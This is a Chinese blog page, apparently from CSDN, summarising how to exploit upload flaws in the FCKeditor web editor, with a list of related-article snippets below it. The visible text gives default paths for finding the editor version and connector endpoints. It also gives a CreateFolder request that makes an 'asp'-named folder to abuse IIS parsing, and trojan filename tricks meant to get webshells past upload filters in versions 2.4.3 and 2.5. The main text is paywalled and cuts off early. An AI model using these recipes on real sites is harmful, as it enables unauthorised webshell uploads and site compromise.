fckeditor php版 漏洞,Fckeditor漏洞总结及利用方法(未成功)

最新推荐文章于 2025-03-08 10:02:04 发布
最新推荐文章于 2025-03-08 10:02:04 发布
阅读量1.6k 收藏
点赞数 1
文章标签: fckeditor php版 漏洞
本文详细介绍了FCKeditor不同版本的漏洞,包括版本2.5、2.4.3、2.2的漏洞利用方法,以及文件上传、创建文件夹的漏洞。讨论了如何通过特殊文件名绕过过滤机制,并提供了多种上传地址和测试案例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

先在这里做一个Fckeditor知识的了解:

FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。

现在利用其本身的开放源代码,进行一些漏洞性的入侵。当然网上也有相关知识,详细资料自己找

第一:查看编辑器版本

其相关默认路径如:

FCKeditor/_whatsnew.html

FCKeditor/editor/dialog/fck_about.html

FCKeditor/_samples/default.html

editor/filemanager/browser/default/browser.html?Connector=../../connectors/cfm/connector.cfm

editor/filemanager/connectors/asp/connector.asp

editor/filemanager/connectors/aspx/connector.aspx

editor/filemanager/connectors/php/connector.php

editor/filemanager/browser/default/browser.html

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=qing.asp后在/up_files/image/目录下创建一个明文qing.asp的文件夹。

在上面的基础下,若Fckeditor版本为2.5

木马的格式可以为

a.aspx.a;.a.aspx.jpg..jpg

若Fckeditor版本为2.4.3

php的文件名加个问号,成功上传解析

/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

支持php的通杀,2.6.4和2.6.5测试未通过

//注:在V2.65中,会发现其过滤机制是以最后一个图片格式为终点点

fckeditor/editor/plugins/bbcode/_sample/sample.html 2.64

—————————————————————————————————————

最低0.47元/天 解锁文章
金雪锋
关注
漏洞复现- - -IIS解析漏洞fckEditor上传攻击中的利用
weixin_67503304的博客
10-26 2330
本文主要讲解了IIS解析漏洞fckEditor上传攻击中的利用方式及其详细步骤。
FCKeditor文件上传漏洞利用-File-Upload-Vulnerability-in-FCKEditor1
08-03
FCKeditor文件上传漏洞利用 - File-Upload-Vulnerability-in-FCKEditor1】 本文主要探讨了FCKeditor(现称为CKeditor)中的PHP文件上传模块存在的安全漏洞,允许攻击者绕过文件类型检查,将恶意PHP代码上传到...
fckeditor 漏洞php,Fckeditor漏洞利用总结
weixin_28366353的博客
03-11 646
查看编辑器FCKeditor/_whatsnew.html———————————————————————————————————————————2.Version2.2本Apache+linux环境下在上传文件后面加个.突破!测试通过。———————————————————————————————————————————3.Version<=2.4.2Forphp在处理...
文件上传(包括编辑器上传)漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上传漏洞可做参考)
最新发布
Python84310366的博客
03-08 895
最后,攻击者重新发送修改后的请求,以上传恶意文件。由于服务器认为上传的是JPEG图片,所以文件将被放行,即使上传的实际是一个可执行的PHP脚本,也将被视为正常的图片文件。type,即便上传一个“avatar.jpg”文件,实际上这是一个php脚本文件,攻击者成功绕过了文件类型检测机制,该文件会被服务器识别为php文件并执行其中的恶意代码。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。
fckeditor php上传利用漏洞,Fckeditor 2.4.2 php任意上传文件漏洞
weixin_36416418的博客
03-17 485
fckeditor/editor/filemanager/upload/php/upload.php/** FCKeditor - The text editor for Internet - http://www.fckeditor.net* Copyright (C) 2003-2007 Frederico Caldeira Knabben** == BEGIN LICENSE ==** Li...
fckeditor 漏洞php,FCKeditor connector.php任意文件上传漏洞
weixin_36358109的博客
03-11 628
BUGTRAQ ID: 31812CVE(CAN) ID: CVE-2008-6178FCKeditor是一款开放源码的HTML文本编辑器。FCKeditor的editor/filemanager/browser/default/connectors/php/connector.php模块中存在文件上传限制漏洞:147. function FileUpload( $resourceType...
Fckeditor 2.4.2 php任意上传文件漏洞
开始我的学习日志
01-30 2056
<br />Fckeditor 2.4.2 php任意上传文件漏洞(2)<br /> <br /> <br />问题主要是出在config.php文件中对Media目录作白名单和黑名单的限制,大概是写漏了,因为在fckeditor/editor/filemanager/browser/default/connectors/php目录中的config.php文件对Media是有限制的。<br /> <?php<br />/*<br />* FCKeditor - The text editor for In
FCKeditor漏洞总结
01-24
### FCKeditor 漏洞总结 #### 一、概览 FCKeditor是一款非常流行的富文本编辑器,在很多网站中都有广泛的应用。然而,它的一些本存在多种安全漏洞,这些漏洞可能导致各种安全问题,包括但不限于文件上传漏洞...
FCKeditor 新闻组件的一些程序漏洞
10-30
总结而言,FCKeditor新闻组件的漏洞主要集中在文件上传和目录操作的功能点上,尤其是connector.aspx文件的处理不当。攻击者利用这些漏洞可以轻易地在网站上新建文件夹、查看网站结构、上传任意文件,甚至执行代码,...
Fckeditor漏洞
zhangpeng999123的博客
03-07 2752
首先是对目标站点进行了基本的测试然后发现了存在fckeditorfckeditor漏洞有很多,基本asp的都被通杀了,大家可以在网上看看。首先看看编辑器的本: $ http://xxxxxxx.com/fckeditor/editor/dialog/fck_about.html 查看本信息: 本信息 可以看到是2.6.6的本,那就对症下药。同时提一下,查看...
Fckeditor 漏洞最新整理.
09-05
Fckeditor 漏洞最新整理. 网络 安全 web出防攻
fckeditor2.6.5 for jsp
01-02
直接放到tomcat 下以fckeditor2.6.5 demo命名或放在jboss以fckeditor2.6.5 demo.war 命名就可以使用。具体方法网上很多
FCKeditor 2.6.6 可直接使用
07-19
比起ckeditor编辑器,还是觉得这个好用,可直接复制到自己的项目上去使用,使用文档里有使用指南!
FCKeditor漏洞利用
weixin_33955681的博客
06-12 543
FCKeditor漏洞利用 查看编辑器FCKeditor/_whatsnew.html fckeditor/editor/dialog/fck_about.html ————————————————————————————————————————————————————————————— 2. Version 2.2 本 Apache+linux 环境下在上传文件后面加个....
新突破fckeditor漏洞
weixin_34283445的博客
03-20 148
经测试,此方法通杀asp、aspx本,不适用于php。 之前很多的方法,诸如上传*.asp等类型文件;创建*.asp等目录…… 今天遇到一个fck编辑器,跟之前很多次一样,以上方法均无果。 创建*.asp;*.php等目录无果;上传*.asp;.jpg等文件无果;神马cer之类的就不说了。 以下是误打误撞的方法,不知道黑扩们发了没。 仍然利用的以下地址: htt...
FCKeditor2.4.3文件上传-文本编辑器漏洞
m0_61361405的博客
03-27 943
FCKeditor文本编辑程序,是用户提供在线的文档编辑服务,其具有与微软office软件一样的功能,与之不同的是FCKeditor不需要用户安装任何形式的客户端,FCKeditor程序非常精简但功能强大,因此而受到广大应用者的青睐。而FCKeditor在2.4.3本中存在可以利用的文件上传漏洞首先是敏感信息的暴露:在/FCKeditor/editor/dialog/fck_about.html中能查看到FCKeditor本信息。除此之外还有默认上传页面和其他敏感文件。
FCKeditor漏洞总结 经常被挂马的网站请注意(转)
b9264826的博客
11-05 562
FCKeditor介绍FCKeditor是一款功能强大的开源在线文本编辑器(DHTML editor),它使你在web上可以使用类似微软Word 的桌面文本编辑器的许多强大功能。它是轻量级且不必在客户端进行任何方式的安装。 FCKeditor兼容Firefox, Mozilla, Netscape 和IE。FCKeditor官司方网址:http://www.fckeditor.net/F...
Fckeditor漏洞汇总
weixin_34242331的博客
01-16 479
1.查看编辑器FCKeditor/_whatsnew.html ————————————————————————————————————————————————————————————— 2. Version 2.2 本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 ——————————————————————————————————...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值